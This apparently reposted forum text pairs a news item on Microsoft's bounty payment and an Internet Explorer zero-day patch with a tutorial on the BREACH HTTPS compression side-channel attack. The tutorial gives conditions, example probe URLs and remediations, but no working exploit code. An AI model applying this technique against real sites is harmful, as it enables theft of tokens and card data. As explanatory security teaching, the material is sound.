reward programs four months ago to bolster efforts to prevent sophisticated attackers from subverting new security technologies in its software, which runs on the majority of the world's PCs. Forshaw has been credited with identifying several dozen software security bugs. He was awarded a large bounty from Hewlett-Packard for identifying a way to "pwn", or take ownership of, Oracle's Java software in a high-profile contest known as Pwn2Own (pronounced "pown to own"). Microsoft also released an automatic update to Internet Explorer on Tuesday afternoon to fix a security bug that it first disclosed last month. Researchers say hackers initially exploited that flaw to launch attacks on companies in Asia in an operation that cyber security firm FireEye has dubbed DeputyDog. Marc Maiffret, chief technology officer of the cyber security firm BeyondTrust, said the vulnerability was later more broadly used after Microsoft's disclosure of the issue brought it to the attention of cybercriminals. He is advising PC users to immediately install the update to Internet Explorer, if they do not have their PCs already set to automatically download updates. "Any time they patch something that has already been used [to launch attacks] in the wild, then it is critical to apply the patch," Maiffret said. That vulnerability in Internet Explorer was known as a "zero-day" because Microsoft, the targeted software maker, had zero days notice to fix the hole when the initial attacks exploiting the bug were discovered. In an active, underground market for "zero day" vulnerabilities, criminal groups and governments sometimes pay $US1 million or more to hackers who identify such bugs. Microsoft's reward is slightly more generous than that of Yahoo!, which recently offered a security researcher a $US25 voucher to the company's online store for reporting three security flaws. Yahoo later opened up a program, with rewards of up to $US15,000, after security researchers ridiculed the minuscule $US25 prize. Sursa: Microsoft pays Australian hacker $100,000 for finding security holes

The Breach Attack Rohit T October 07, 2013 Introduction Back in 2012, when Juliano Rizzo and Thai Duong announced the CRIME attack, a TLS / SSL Compression attack against HTTPS, the ability to recover selected parts of the traffic through side channel attacks was proven. This attack was mitigated by disabling the TLS / SSL level compression for most of the browsers. This year at Black Hat, a new attack called BREACH (browser reconnaissance and exfiltration via adaptive compression of hypertext) was announced and it commanded the attention of entire industry. This presentation, titled “SSL Gone in 30 seconds,” is not properly understood and hence there seems to be some confusion about how to mitigate the problem. So I felt that this article should give some detailed insight into how notorious the attack is, how it works, how practical it is, and what needs to be done to mitigate it. So let’s have a look. BREACH Attack Unlike the previously known attacks, such as BEAST, LUCKY, etc., BREACH is not an attack against TLS; it is basically an attack against HTTP. If you are familiar with the famous Oracle padding attack, BREACH is somewhat easy to understand. A BREACH attack can extract login tokens, email addresses, and other sensitive information from TLS encrypted web traffic in as little as 30 seconds (depending on the number of bytes to be extracted). The attacker just needs to trick the victim into visiting a malicious link to execute the attack. Before going into the details, let me explain a little bit more about the basic things you need to know. Web pages are generally compressed before the responses are sent out, which is called HTTP compression, primarily to make better use of available bandwidth and to provide greater transmission speeds. The browser usually tells the server (through the “Accept-Encoding” header), what compression methods it supports and the server accordingly compresses the content and sends it across. If the browser does not support any compression then the response is not compressed. The most commonly used compression algorithms are gzip and deflate. Accept-Encoding: gzip, deflate When the content arrives, it is uncompressed by the browser and processed. So, basically with SSL-enabled web sites, the content is first compressed, then encrypted and sent. But you can determine the length of this compressed content even when it’s wrapped by SSL. How Does It Work? The attack primarily works by taking advantage of the compressed size of the text when there are repetitive terms. Here is a small example that explains how deflate takes advantage of repetitive terms to reduce the compressed size of the response. Consider the search page below, which is present after logging into this site: http://www.ghadiwala.com/catalogsearch/result/?q= Observe that the text highlighted in red box is the username. Now enter any text (say “random”) and click “Search.” URL: Search results for: 'random' , GhadiWala.com So you can control the response through the input parameter in the URL. Now imagine that the search term is “Pentesting” (which is the username in this case). URL: Search results for: 'Pentesting' , GhadiWala.com Now, when the deflate algorithm is compressing the above response, it finds that the term “Pentesting” is repeated more than once in the response. So, instead of displaying it a second time, the compressor says “this text is found 101 characters ago.” This reduces the size of the compressed output. In other words, by controlling the input search parameter, you can guess the username. How? The compressed size would be least when the search parameter matches the username. This concept is the base for the BREACH attack. Practical Attack Now let us see how an attacker would practically exploit this issue and steal any sensitive information. Consider the site below and assume a legitimate user has just signed in. [before signing in to the application] [search page, which is accessible after logging in] As shown in the above figure, also assume that there is some sensitive data in the Search page, for example, a card number. When the user searches for something (say “test”) the following message is displayed. Now an attacker, using social engineering techniques, could lure this currently signed-in user to click on a link. The link would be a simple html page that has a JavaScript in it that will request searches continuously for search terms “100-1000.” For example, the JavaScript would request the URLs shown below: http://localhost/demo/Search?p=100 http://localhost/demo/Search?p=101 ……… http://localhost/demo/Search?p=10000 The attacker can also get the compressed sizes of the responses for each of these requests. Can you guess why the compresses sizes for each of these responses would differ and can you guess which request would have the smallest compressed size? Below are the requests with the smallest compressed sizes: http://localhost/demo/Search?p=4545 http://localhost/demo/Search?p=5454 http://localhost/demo/Search?p=4543 http://localhost/demo/Search?p=5433 Below is the explanation of why the above requests have the smallest compressed sizes. Take the first request. Here is the response from the server: URL: http://localhost/demo/Search?p=4545 As shown above, when the deflate algorithm encounters this, it makes an easy representation of the repetitions and thus results in a least compressed size. So by analyzing the compressed size for each of the requests from 100-10000, an attacker can simply deduce what the card number is in this case. This the beauty of this attack lies in the fact that we did not decrypt any traffic but just by analyzing the size of the responses we were able to predict the text. To summarize in simple steps, for an application to be vulnerable to this breach attack, here are the conditions that it must fulfill: The server should be using HTTP level compression. There must be a parameter that reflects the input text. (This will be controlled by the attacker). The page should contain some sensitive text that would be of interest to the attacker. Remediation Turning off HTTP compression would save the day, but that cannot be a possible solution, since all the servers rely on it to effectively manage the bandwidth. Here are some of the other solutions that can be tried: Protecting the vulnerable pages with a CSRF token. Adding random bytes to the response to hide the actual compressed length. Separating the sensitive data from the pages where input text is displayed. Sursa: The Breach Attack